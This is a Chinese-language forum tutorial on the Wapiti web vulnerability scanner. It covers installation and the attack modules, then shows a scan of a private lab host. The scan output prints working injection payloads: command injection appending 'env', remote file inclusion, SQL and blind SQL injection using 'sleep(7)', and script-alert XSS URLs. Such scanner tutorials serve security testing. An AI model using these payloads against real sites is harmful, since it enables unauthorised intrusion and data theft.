切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
338 Web Fuzzing : Wapiti[复制链接]
发表于 2012-11-1 20:13:28 | 显示全部楼层 |!read_mode!
功能

功能和特点 文件处理错误(本地和远程打开文件,readfile … )
数据库注入(PHP/JSP/ASP,SQL和XPath注入) XSS(跨站点脚本)注入
LDAP注入 命令执行检测(eval(), system(), passtru()…)
CRLF注射入(HTTP响应,session固定… ) 统计漏洞数量
成功袭击的细节 漏洞详细信息


下载
  1. root@Dis9Team:/pen/web# wget http://dis9-server.googlecode.com/files/wapiti-2.2.1.zip
  2. root@Dis9Team:/pen/web# unzip wapiti-2.2.1.zip
  3. root@Dis9Team:/pen/web# cd wapiti-2.2.1
  4. root@Dis9Team:/pen/web/wapiti-2.2.1# cd src/
  5. root@Dis9Team:/pen/web/wapiti-2.2.1/src# python wapiti.py
复制代码
默认FUZZ字典
  1. ./config/attacks
  2. ./config/attacks/blindSQLPayloads.txt
  3. ./config/attacks/backupPayloads.txt
  4. ./config/attacks/fileHandlingPayloads.txt
  5. ./config/attacks/xssPayloads.txt
  6. ./config/attacks/execPayloads.txt
复制代码
附带的工具目录
  1. ./net/HTTP.pyc
  2. ./net/HTTP.py
  3. ./net/cookie.py
  4. ./net/libcookie.pyc
  5. ./net/getcookie.py
  6. ./net/crawlerpersister.pyc
复制代码


攻击模块
  1. ./attack
  2. ./attack/mod_crlf.py
  3. ./attack/__init__.py
  4. ./attack/attack.py
  5. ./attack/mod_nikto.py
  6. ./attack/mod_sql.py
  7. ./attack/vulnerabilitiesdescriptions.py
  8. ./attack/mod_blindsql.py
  9. ./attack/mod_permanentxss.py
  10. ./attack/mod_file.py
  11. ./attack/mod_xss.py
  12. ./attack/mod_exec.py
  13. ./attack/mod_backup.py
  14. ./attack/mod_htaccess.py
复制代码
默认扫描一站点

用PY2.7出错 用2.6,如果没必要 请勿测试mod_xss


  1. root@Dis9Team:/pen/web/wapiti-2.2.1/src# python2.6 wapiti.py http://192.168.71.130/pen/
  2. Wapiti-2.2.1 (wapiti.sourceforge.net)
  3. ...................
  4. Notice
  5. ========
  6. This scan has been saved in the file /pen/web/wapiti-2.2.1/src/scans/192.168.71.130.xml
  7. You can use it to perform attacks without scanning again the web site with the "-k" parameter
  8. [*] Loading modules :
  9.         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
复制代码

默认保存为XM

  1. This scan has been saved in the file /pen/web/wapiti-2.2.1/src/scans/192.168.71.130.xml
复制代码

启用全部模块

  1. [*] Loading modules :
  2.         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
复制代码

接下来就输入FUZZ的链接

  1. [+] Launching module crlf

  2. [+] Launching module exec
  3. Command execution (ls) in http://192.168.71.130/pen/share/index.php
  4.   Evil url: http://192.168.71.130/pen/share/index.php?ls=a%3Benv
  5. 500 HTTP Error code with
  6.   Evil url: http://192.168.71.130/pen/share/info.php?arg=a%29%3Benv

  7. [+] Launching module file
  8. Remote include (cat) in http://192.168.71.130/pen/file.php
  9.   Evil url: http://192.168.71.130/pen/file.php?cat=http%3A%2F%2Fwww.google.fr%2F
  10. 500 HTTP Error code with
  11.   Evil url: http://192.168.71.130/pen/share/info.php?arg=http%3A%2F%2Fwww.google.fr%2F

  12. [+] Launching module sql
  13. MySQL Injection (id) in http://192.168.71.130/pen/news.php
  14.   Evil url: http://192.168.71.130/pen/news.php?id=%BF%27%22%28
  15. 500 HTTP Error code with
  16.   Evil url: http://192.168.71.130/pen/share/info.php?arg=%BF%27%22%28

  17. [+] Launching module xss
  18. XSS (id) in http://192.168.71.130/pen/news.php
  19.   Evil url: http://192.168.71.130/pen/news.php?id=%3Cscript%3Ealert%28%27xy4wvdn4q2%27%29%3C%2Fscript%3E
  20. Found XSS in http://192.168.71.130/pen/index.php
  21.   with params = qq=z6e08ts7xm&message=qa830istr7&name=%3Cscript%3Ealert%28%27x4w4b72txg%27%29%3C%2Fscript%3E&submit=%CC%E1%BD%BB
  22.   coming from http://192.168.71.130/pen/
  23. Found XSS in http://192.168.71.130/pen/index.php
  24.   with params = qq=on&message=31gu0tcbad&name=%3Cscript%3Ealert%28%275e5k0g4g2l%27%29%3C%2Fscript%3E&submit=%CC%E1%BD%BB
  25.   coming from http://192.168.71.130/pen/index.php?page=2

  26. [+] Launching module blindsql
  27. 500 HTTP Error code with
  28.   Evil url: http://192.168.71.130/pen/share/info.php?arg=sleep%287%29%23
  29. Blind SQL Injection in http://192.168.71.130/pen/post_con.php
  30.   with params = pwd=%27+or+sleep%287%29%23&name=znokzwljbi
  31.   coming from http://192.168.71.130/pen/
  32. Blind SQL Injection in http://192.168.71.130/pen/post_con.php
  33.   with params = pwd=rz9gfvvroz&name=%27+or+sleep%287%29%23
  34.   coming from http://192.168.71.130/pen/
  35. Blind SQL Injection in http://192.168.71.130/pen/post_con.php
  36.   with params = pwd=%27+or+sleep%287%29%23&name=nyk49cmcmk
  37.   coming from http://192.168.71.130/pen/index.php?page=2
  38. Blind SQL Injection in http://192.168.71.130/pen/post_con.php
  39.   with params = pwd=on&name=%27+or+sleep%287%29%23
  40.   coming from http://192.168.71.130/pen/index.php?page=2
复制代码

扫描结束后查看报表


  1. ------
  2. A report has been generated in the file generated_report
  3. Open generated_report/index.html with a browser to see this report
  4. root@Dis9Team:/pen/web/wapiti-2.2.1/src# firefox generated_report/index.html
复制代码



自定义报表


  1. root@Dis9Team:/pen/web/wapiti-2.2.1/src# python wapiti.py http://server.com/base/url/ -o 123 -f html
复制代码


DEBUG模式
  1. root@Dis9Team:/pen/web/wapiti-2.2.1/src# python2.6 wapiti.py http://192.168.71.130/pen/ -v 2
  2. Wapiti-2.2.1 (wapiti.sourceforge.net)

  3. http://192.168.71.130/pen/


  4. http://192.168.71.130/pen/news.php?id=1


  5. http://192.168.71.130/pen/file.php?cat=about.txt


  6. http://192.168.71.130/pen/share/index.php?ls=


  7. http://192.168.71.130/pen/share/info.php?arg=phpinfo();

  8. /pen/web/wapiti-2.2.1/src/net/lswww.py:294: UnicodeWarning: Unicode equal comparison failed to convert both arguments to Unicode - interpreting them as being unequal
  9.   if form[0:3] not in [x[0:3] for x in self.forms]: self.forms.append(form)
复制代码


指定模块
全部 -m all 单个或者几个 -m xss:get,exec:post完整扫描
  1. python wapiti.py http://mysite.com -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
复制代码






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-23 10:47

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部